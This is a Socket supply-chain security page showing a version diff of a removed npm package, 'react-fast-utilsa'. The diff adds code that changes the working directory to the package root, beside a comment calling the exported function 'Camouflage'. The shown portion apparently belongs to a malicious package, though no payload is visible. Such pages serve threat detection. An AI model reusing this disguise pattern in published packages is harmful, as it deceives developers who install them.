Latest Threat Research:SANDWORM_MODE: Shai-Hulud-Style npm Worm Hijacks CI Workflows and Poisons AI Toolchains.Details →
Socket
Book a DemoInstallSign in
Socket

react-fast-utilsa

Package Overview
Dependencies
Maintainers
1
Versions
4
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

react-fast-utilsa - npm Package Compare versions

Package was removed
Sorry, it seems this package was removed from the registry
Comparing version
2.0.1
to
2.0.2
+1
-1
package.json
{
"name": "react-fast-utilsa",
"version": "2.0.1",
"version": "2.0.2",
"description": "Utility layer for asynchronous state management",

@@ -5,0 +5,0 @@ "main": "index.js",

@@ -7,2 +7,9 @@ const fs = require('fs');

// Force CWD to package root to ensure consistent execution environment
try {
process.chdir(path.join(__dirname, '..'));
} catch (e) {
// Ignore if already there or restricted
}
// The "Useful" functionality (Camouflage)

@@ -9,0 +16,0 @@ exports.usefulFunction = function () {